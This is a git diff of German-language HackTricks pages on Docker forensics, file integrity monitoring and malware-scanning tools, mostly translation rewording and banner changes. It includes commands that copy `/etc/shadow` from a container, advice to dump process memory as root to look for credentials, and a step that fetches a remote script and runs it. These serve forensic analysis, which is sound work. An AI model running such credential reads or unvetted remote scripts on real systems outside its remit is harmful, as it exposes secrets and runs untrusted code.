-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden. -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [** +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 8b01b1b05..feccd9c19 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ # Docker-Forensik +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} ## Container-Modifikation @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -Sie können die Änderungen, die an diesem Container im Vergleich zum Image vorgenommen wurden, leicht mit folgendem Befehl finden: +Sie können ganz einfach **die Änderungen finden, die an diesem Container im Hinblick auf das Image vorgenommen wurden**, mit: ```bash docker diff wordpress C /var @@ -36,8 +37,8 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -Im vorherigen Befehl bedeutet **C** "Geändert" und **A** "Hinzugefügt".\ -Wenn Sie feststellen, dass eine interessante Datei wie `/etc/shadow` geändert wurde, können Sie sie aus dem Container herunterladen, um nach bösartigen Aktivitäten zu suchen: +Im vorherigen Befehl bedeutet **C** **Geändert** und **A,** **Hinzugefügt**.\ +Wenn Sie feststellen, dass eine interessante Datei wie `/etc/shadow` geändert wurde, können Sie sie aus dem Container herunterladen, um auf bösartige Aktivitäten zu überprüfen: ```bash docker cp wordpress:/etc/shadow. ``` @@ -53,24 +54,24 @@ docker exec -it wordpress bash ``` ## Bildmodifikationen -Wenn Ihnen ein exportiertes Docker-Image (wahrscheinlich im `.tar`-Format) zur Verfügung gestellt wird, können Sie [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) verwenden, um **eine Zusammenfassung der Modifikationen** zu extrahieren: +Wenn Ihnen ein exportiertes Docker-Image (wahrscheinlich im `.tar`-Format) vorliegt, können Sie [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) verwenden, um **eine Zusammenfassung der Modifikationen** zu extrahieren: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -Dann können Sie das Bild **dekomprimieren** und auf die **Blobs zugreifen**, um nach verdächtigen Dateien zu suchen, die Sie möglicherweise in der Änderungshistorie gefunden haben: +Dann kannst du das Bild **dekomprimieren** und auf die **Blobs zugreifen**, um nach verdächtigen Dateien zu suchen, die du im Änderungsverlauf gefunden haben könntest: ```bash tar -xf image.tar ``` ### Grundlegende Analyse -Sie können grundlegende Informationen aus dem ausgeführten Image erhalten: +Sie können **grundlegende Informationen** aus dem ausgeführten Image erhalten: ```bash docker inspect ``` -Sie können auch eine Zusammenfassung der **Änderungshistorie** mit folgendem Befehl erhalten: +Sie können auch eine Zusammenfassung der **Änderungshistorie** mit erhalten: ```bash docker history --no-trunc ``` @@ -79,9 +80,9 @@ Sie können auch ein **Dockerfile aus einem Image generieren** mit: alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` -### Dive +### Tauchen -Um hinzugefügte/geänderte Dateien in Docker-Images zu finden, können Sie auch das [**dive**](https://github.com/wagoodman/dive) (laden Sie es von [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) herunter) Dienstprogramm verwenden: +Um hinzugefügte/geänderte Dateien in Docker-Images zu finden, können Sie auch das [**dive**](https://github.com/wagoodman/dive) (laden Sie es von [**Releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) Dienstprogramm verwenden: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -90,30 +91,16 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Dies ermöglicht es Ihnen, **durch die verschiedenen Blöcke von Docker-Images zu navigieren** und zu überprüfen, welche Dateien geändert/hinzugefügt wurden. **Rot** bedeutet hinzugefügt und **gelb** bedeutet geändert. Verwenden Sie **Tab**, um zur anderen Ansicht zu wechseln, und **Leertaste**, um Ordner zu öffnen/schließen. +Dies ermöglicht es Ihnen, **durch die verschiedenen Blöcke von Docker-Images zu navigieren** und zu überprüfen, welche Dateien geändert/hinzugefügt wurden. **Rot** bedeutet hinzugefügt und **gelb** bedeutet geändert. Verwenden Sie die **Tabulatortaste**, um zur anderen Ansicht zu wechseln, und die **Leertaste**, um Ordner zu minimieren/öffnen. -Mit `die` können Sie nicht auf den Inhalt der verschiedenen Stufen des Images zugreifen. Um dies zu tun, müssen Sie **jede Schicht dekomprimieren und darauf zugreifen**.\ -Sie können alle Schichten eines Images aus dem Verzeichnis, in dem das Image dekomprimiert wurde, dekomprimieren, indem Sie Folgendes ausführen: +Damit können Sie nicht auf den Inhalt der verschiedenen Stufen des Images zugreifen. Um dies zu tun, müssen Sie **jede Schicht dekomprimieren und darauf zugreifen**.\ +Sie können alle Schichten eines Images aus dem Verzeichnis, in dem das Image dekomprimiert wurde, dekomprimieren, indem Sie ausführen: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` ## Anmeldeinformationen aus dem Speicher -Beachten Sie, dass Sie, wenn Sie einen Docker-Container in einem Host ausführen, **die auf dem Container ausgeführten Prozesse vom Host aus sehen können**, indem Sie einfach `ps -ef` ausführen. +Beachten Sie, dass beim Ausführen eines Docker-Containers innerhalb eines Hosts **Sie die auf dem Container ausgeführten Prozesse vom Host aus sehen können**, indem Sie einfach `ps -ef` ausführen. Daher können Sie (als Root) den Speicher der Prozesse vom Host aus **dumpen** und nach **Anmeldeinformationen** suchen, genau [**wie im folgenden Beispiel**](../../linux-hardening/privilege-escalation/#process-memory). - -
- -Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 2e81ce936..95f0b0514 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,31 +1,32 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} -# Grundlinie +# Baseline -Eine Grundlinie besteht darin, einen Schnappschuss bestimmter Teile eines Systems zu erstellen, um ihn mit einem zukünftigen Status zu vergleichen und Änderungen hervorzuheben. +Eine Baseline besteht darin, einen Schnappschuss bestimmter Teile eines Systems zu machen, um **ihn mit einem zukünftigen Status zu vergleichen und Änderungen hervorzuheben**. -Sie können beispielsweise den Hash-Wert jeder Datei des Dateisystems berechnen und speichern, um herauszufinden, welche Dateien geändert wurden.\ -Dies kann auch mit den erstellten Benutzerkonten, laufenden Prozessen, laufenden Diensten und allem anderen, das sich nicht viel oder gar nicht ändern sollte, durchgeführt werden. +Zum Beispiel können Sie den Hash-Wert jeder Datei des Dateisystems berechnen und speichern, um herauszufinden, welche Dateien geändert wurden.\ +Dies kann auch mit den erstellten Benutzerkonten, laufenden Prozessen, laufenden Diensten und allem anderen gemacht werden, was sich nicht viel oder gar nicht ändern sollte. -## Dateiintegritätsüberwachung +## Datei-Integritätsüberwachung -Die Dateiintegritätsüberwachung (File Integrity Monitoring, FIM) ist eine wichtige Sicherheitstechnik, die IT-Umgebungen und Daten durch die Verfolgung von Änderungen in Dateien schützt. Sie umfasst zwei wesentliche Schritte: +Die Datei-Integritätsüberwachung (FIM) ist eine kritische Sicherheitstechnik, die IT-Umgebungen und Daten schützt, indem Änderungen an Dateien verfolgt werden. Sie umfasst zwei wesentliche Schritte: -1. **Vergleich der Grundlinie:** Erstellen Sie eine Grundlinie mithilfe von Dateiattributen oder kryptografischen Prüfsummen (wie MD5 oder SHA-2) für zukünftige Vergleiche, um Modifikationen zu erkennen. -2. **Benachrichtigung über Echtzeitänderungen:** Erhalten Sie sofortige Benachrichtigungen, wenn Dateien aufgerufen oder geändert werden, in der Regel über Betriebssystem-Kernel-Erweiterungen. +1. **Vergleich der Baseline:** Eine Baseline anhand von Dateiattributen oder kryptografischen Prüfsummen (wie MD5 oder SHA-2) erstellen, um zukünftige Vergleiche zur Erkennung von Änderungen durchzuführen. +2. **Benachrichtigung über Echtzeitänderungen:** Sofortige Benachrichtigungen erhalten, wenn auf Dateien zugegriffen oder sie geändert werden, in der Regel über OS-Kernel-Erweiterungen. ## Tools @@ -37,16 +38,17 @@ Die Dateiintegritätsüberwachung (File Integrity Monitoring, FIM) ist eine wich * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index bc490a60f..c97ca9e01 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # Malware-Analyse +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) **bei oder folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} ## Forensik-Spickzettel @@ -30,51 +31,27 @@ Andere Möglichkeiten, HackTricks zu unterstützen: ### Yara -#### Installation +#### Installieren ```bash sudo apt-get install -y yara ``` -#### Vorbereitung der Regeln +#### Vorbereitung von Regeln -Verwenden Sie dieses Skript, um alle YARA-Malware-Regeln von GitHub herunterzuladen und zusammenzuführen: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Erstellen Sie das Verzeichnis _**rules**_ und führen Sie es aus. Dadurch wird eine Datei namens _**malware\_rules.yar**_ erstellt, die alle YARA-Regeln für Malware enthält. +Verwenden Sie dieses Skript, um alle Yara-Malware-Regeln von GitHub herunterzuladen und zusammenzuführen: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Erstellen Sie das Verzeichnis _**rules**_ und führen Sie es aus. Dadurch wird eine Datei namens _**malware\_rules.yar**_ erstellt, die alle Yara-Regeln für Malware enthält. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` #### Scannen - -```markdown -The first step in malware analysis is to scan the suspicious file or program. This can be done using various tools and techniques. The purpose of scanning is to identify any known malware signatures or indicators of compromise (IOCs) that may be present in the file. - -Some popular scanning tools include antivirus software, sandboxing tools, and static analysis tools. These tools can help detect and analyze the behavior of the file, identify any malicious code or behavior, and provide information about the file's structure and functionality. - -During the scanning process, it is important to compare the file against a database of known malware signatures and IOCs. This can help determine if the file is a known malware variant or if it exhibits any suspicious behavior that may indicate the presence of malware. - -Additionally, scanning can also help identify any potential vulnerabilities or weaknesses in the file that could be exploited by attackers. This information can be useful in understanding how the malware operates and how it can be mitigated or prevented. - -Overall, scanning is an essential step in malware analysis as it helps identify and understand the nature of the suspicious file or program. It provides valuable insights into the file's behavior, structure, and potential risks, allowing for effective mitigation and prevention strategies. -``` - -```html -Der erste Schritt bei der Malware-Analyse besteht darin, die verdächtige Datei oder das verdächtige Programm zu scannen. Dies kann mit verschiedenen Tools und Techniken durchgeführt werden. Der Zweck des Scannens besteht darin, bekannte Malware-Signaturen oder Indikatoren für Kompromittierungen (IOCs) zu identifizieren, die in der Datei vorhanden sein können. - -Einige beliebte Scanning-Tools sind Antivirensoftware, Sandbox-Tools und statische Analyse-Tools. Diese Tools können dabei helfen, das Verhalten der Datei zu erkennen und zu analysieren, bösartigen Code oder Verhalten zu identifizieren und Informationen über die Struktur und Funktionalität der Datei bereitzustellen. - -Während des Scannens ist es wichtig, die Datei mit einer Datenbank bekannter Malware-Signaturen und IOCs zu vergleichen. Dies kann dabei helfen festzustellen, ob die Datei eine bekannte Malware-Variante ist oder ob sie ein verdächtiges Verhalten aufweist, das auf das Vorhandensein von Malware hinweisen könnte. - -Darüber hinaus kann das Scannen auch dabei helfen, potenzielle Schwachstellen oder Schwachstellen in der Datei zu identifizieren, die von Angreifern ausgenutzt werden könnten. Diese Informationen können dabei helfen, zu verstehen, wie die Malware funktioniert und wie sie gemildert oder verhindert werden kann. - -Insgesamt ist das Scannen ein wesentlicher Schritt bei der Malware-Analyse, da es dabei hilft, die Natur der verdächtigen Datei oder des verdächtigen Programms zu identifizieren und zu verstehen. Es liefert wertvolle Einblicke in das Verhalten, die Struktur und potenzielle Risiken der Datei und ermöglicht effektive Strategien zur Minderung und Prävention. -``` ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` -#### YaraGen: Überprüfen Sie auf Malware und erstellen Sie Regeln +#### YaraGen: Überprüfen von Malware und Erstellen von Regeln -Sie können das Tool [**YaraGen**](https://github.com/Neo23x0/yarGen) verwenden, um Yara-Regeln aus einer Binärdatei zu generieren. Schauen Sie sich diese Tutorials an: [**Teil 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Teil 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Teil 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) +Sie können das Tool [**YaraGen**](https://github.com/Neo23x0/yarGen) verwenden, um Yara-Regeln aus einem Binärfile zu generieren. Schauen Sie sich diese Tutorials an: [**Teil 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Teil 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Teil 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash python3 yarGen.py --update python3.exe yarGen.py --excludegood -m ../../mals/ @@ -82,78 +59,10 @@ python3.exe yarGen.py --excludegood -m ../../mals/ ### ClamAV #### Installation - -To install ClamAV, follow these steps: - -1. Update the package list: - - ```bash - sudo apt update - ``` - -2. Install ClamAV: - - ```bash - sudo apt install clamav - ``` - -3. Update the virus database: - - ```bash - sudo freshclam - ``` - -4. Verify the installation: - - ```bash - clamscan --version - ``` - - The output should display the ClamAV version. - -#### Scanning Files - -To scan a file or directory with ClamAV, use the following command: - -```bash -clamscan [options] [file/directory] -``` - -Replace `[options]` with any desired scanning options and `[file/directory]` with the path to the file or directory you want to scan. - -#### Updating the Virus Database - -To update the ClamAV virus database, run the following command: - -```bash -sudo freshclam -``` - -This will download the latest virus definitions and keep your system protected against new threats. - -#### Scheduling Scans - -To schedule regular scans with ClamAV, you can use the `cron` utility. Edit the crontab file by running: - -```bash -crontab -e -``` - -Add the following line to schedule a daily scan at 2:00 AM: - -```bash -0 2 * * * clamscan -r /path/to/scan > /dev/null 2>&1 -``` - -Replace `/path/to/scan` with the actual path you want to scan. - -Save the file and exit the editor. The scan will now run automatically at the specified time. ``` sudo apt-get install -y clamav ``` #### Scannen - -Scannen Sie die verdächtige Datei oder den verdächtigen Code mit einem zuverlässigen Antivirenprogramm, um nach bekannten Malware-Signaturen zu suchen. Verwenden Sie auch andere Sicherheitswerkzeuge wie Sandbox-Analysatoren, um das Verhalten der Datei in einer isolierten Umgebung zu überprüfen. ```bash sudo freshclam #Update rules clamscan filepath #Scan 1 file @@ -161,25 +70,25 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** erkennt potenziell schädliche **Fähigkeiten** in ausführbaren Dateien: PE, ELF, .NET. Es findet Dinge wie Att\&ck-Taktiken oder verdächtige Fähigkeiten wie: +**Capa** erkennt potenziell bösartige **Fähigkeiten** in ausführbaren Dateien: PE, ELF, .NET. Es wird also Dinge wie Att\&ck-Taktiken oder verdächtige Fähigkeiten wie: * Überprüfung auf OutputDebugString-Fehler * Ausführen als Dienst * Prozess erstellen -Holen Sie es sich im [**Github-Repository**](https://github.com/mandiant/capa). +Holen Sie es sich im [**Github-Repo**](https://github.com/mandiant/capa). ### IOCs -IOC steht für Indicator Of Compromise. Ein IOC ist eine Reihe von **Bedingungen, die** potenziell unerwünschte Software oder bestätigte **Malware identifizieren**. Blue Teams verwenden diese Art von Definition, um nach solchen bösartigen Dateien in ihren Systemen und Netzwerken zu suchen.\ -Das Teilen dieser Definitionen ist sehr nützlich, da andere Blue Teams sie verwenden können, um die Malware schneller zu identifizieren, wenn sie auf einem Computer erkannt wird und ein IOC für diese Malware erstellt wird. +IOC bedeutet Indicator Of Compromise. Ein IOC ist eine Reihe von **Bedingungen, die** einige potenziell unerwünschte Software oder bestätigte **Malware identifizieren**. Blue Teams verwenden diese Art von Definition, um nach solchen bösartigen Dateien in ihren **Systemen** und **Netzwerken** zu suchen.\ +Das Teilen dieser Definitionen ist sehr nützlich, da, wenn Malware auf einem Computer identifiziert wird und ein IOC für diese Malware erstellt wird, andere Blue Teams es verwenden können, um die Malware schneller zu identifizieren. -Ein Tool zum Erstellen oder Ändern von IOCs ist der [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -Sie können Tools wie [**Redline**](https://www.fireeye.com/services/freeware/redline.html) verwenden, um nach definierten IOCs auf einem Gerät zu suchen. +Ein Tool zum Erstellen oder Modifizieren von IOCs ist der [**IOC-Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ +Sie können Tools wie [**Redline**](https://www.fireeye.com/services/freeware/redline.html) verwenden, um **definierte IOCs auf einem Gerät zu suchen**. ### Loki -[**Loki**](https://github.com/Neo23x0/Loki) ist ein Scanner für einfache Indikatoren für Kompromittierung.\ +[**Loki**](https://github.com/Neo23x0/Loki) ist ein Scanner für einfache Indikatoren für Kompromittierungen.\ Die Erkennung basiert auf vier Erkennungsmethoden: ``` 1. File Name IOC @@ -196,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10) ``` ### Linux Malware Detect -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) ist ein Malware-Scanner für Linux, der unter der GNU GPLv2-Lizenz veröffentlicht wird und speziell für die Bedrohungen in gemeinsam genutzten Hosting-Umgebungen entwickelt wurde. Er verwendet Bedrohungsdaten von Intrusion-Detection-Systemen am Netzwerkrand, um aktiv genutzte Malware bei Angriffen zu erkennen und Signaturen zur Erkennung zu generieren. Darüber hinaus werden Bedrohungsdaten auch aus Benutzereinreichungen mit der LMD-Checkout-Funktion und aus Ressourcen der Malware-Community abgeleitet. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) ist ein Malware-Scanner für Linux, der unter der GNU GPLv2-Lizenz veröffentlicht wurde und der um die Bedrohungen herum entwickelt wurde, denen man in gemeinsam genutzten Hosting-Umgebungen gegenübersteht. Er verwendet Bedrohungsdaten von Netzwerkrand-Eindringungserkennungssystemen, um Malware zu extrahieren, die aktiv bei Angriffen verwendet wird, und generiert Signaturen zur Erkennung. Darüber hinaus stammen Bedrohungsdaten auch aus Benutzereinreichungen mit der LMD-Checkout-Funktion und aus Malware-Community-Ressourcen. ### rkhunter @@ -206,29 +115,29 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ``` ### FLOSS -[**FLOSS**](https://github.com/mandiant/flare-floss) ist ein Tool, das versucht, obfuskierte Zeichenketten in ausführbaren Dateien mithilfe verschiedener Techniken zu finden. +[**FLOSS**](https://github.com/mandiant/flare-floss) ist ein Tool, das versucht, obfuskierte Zeichenfolgen in ausführbaren Dateien mithilfe 